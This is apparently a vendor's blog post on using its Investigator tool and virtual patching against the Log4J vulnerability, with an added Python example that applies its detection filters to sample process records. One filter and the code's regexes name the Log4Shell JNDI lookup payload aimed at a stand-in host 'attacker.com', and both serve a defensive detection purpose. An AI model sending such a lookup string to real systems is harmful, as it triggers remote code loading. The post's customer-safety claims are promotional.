The internet has seemingly been on fire this past week over Log4J, so unless you've been living under a rock, there's no reason to dive into a detailed explanation of what it is. This post is meant to help Minerva customers understand how they can leverage Minerva to make sure they are protected from Log4J vulnerabilities.

 

The Log4J vulnerability is an inherent vulnerability that affects all users differently, depending on their applications and how those applications use the Log4J library. While Minerva's software can be very useful to mitigate and reduce risk, there is no "one size fits all" solution for all customers and applications.

In general, the Investigator tool can be used to quickly and efficiently identify all applications that use Log4J. Minerva virtual patching (isolating vulnerable applications before an official patch is made available by the vendor) can then be used to "vaccinate" those particular tools.
We have a number of customers who have successfully implemented this approach and we have received very positive feedback. None of our customers have reported suffering attacks through the Log4J vulnerability.
It is also important to note that Minerva’s software is not susceptible to the Log4J exploits.

 

Here are a few suggestions for filters you might want to check with Investigator:

1. Process name contains Log4J
2. Process command line contains Log4J
3. Process command line contains ${jndi:ldap://attacker.com/a}
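The three filters above, applied to a handful of process records, as an added example (this is not Minerva's code; the record fields `pid`, `name` and `cmdline` and all sample records are constructed assumptions, not Investigator's export format). It goes one step beyond filter 3 by matching any `${jndi:` scheme and host, because the literal URL in the list only matches that single host:

```python
import re

# Filters 1 and 2: "log4j" anywhere in the process name or command line.
LOG4J_RE = re.compile(r"log4j", re.IGNORECASE)
# Filter 3, widened: any ${jndi:<scheme>://<host> lookup, not one literal URL.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)
# Jar file names, so a command-line hit can be tied to a file on disk.
JAR_RE = re.compile(r"log4j[\w.-]*\.jar", re.IGNORECASE)

# Constructed sample records (hypothetical export format: pid, name, cmdline).
SAMPLE = [
    {"pid": 4120, "name": "java.exe",
     "cmdline": r"java -cp C:\app\lib\log4j-core-2.x.jar;C:\app\app.jar com.example.Main"},
    {"pid": 5544, "name": "Log4jDemo.exe", "cmdline": "Log4jDemo.exe --port 8080"},
    {"pid": 6010, "name": "svc.exe",
     "cmdline": "svc.exe --user ${jndi:ldap://attacker.com/a}"},
    {"pid": 6011, "name": "svc.exe",
     "cmdline": "svc.exe --user ${JNDI:rmi://other.example/x}"},
    {"pid": 7001, "name": "notepad.exe", "cmdline": r"notepad.exe C:\notes.txt"},
]

def classify(proc):
    """Return the filter hits for one process record."""
    name, cmd = proc.get("name", ""), proc.get("cmdline", "")
    hits = []
    if LOG4J_RE.search(name):
        hits.append("name:log4j")
    if LOG4J_RE.search(cmd):
        jars = sorted({m.group(0) for m in JAR_RE.finditer(cmd)})
        hits.append("cmdline:log4j" + (" [" + ", ".join(jars) + "]" if jars else ""))
    m = JNDI_RE.search(cmd)
    if m:
        hits.append(f"cmdline:jndi scheme={m.group(1).lower()} host={m.group(2)}")
    return hits

def scan(records):
    """Map pid -> hits for every record that matches at least one filter."""
    return {r["pid"]: h for r in records if (h := classify(r))}

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE).items():
        print(pid, hits)
```

Record 6011 is the case the literal filter 3 string would miss: the lookup is upper-cased and points at a different scheme and host.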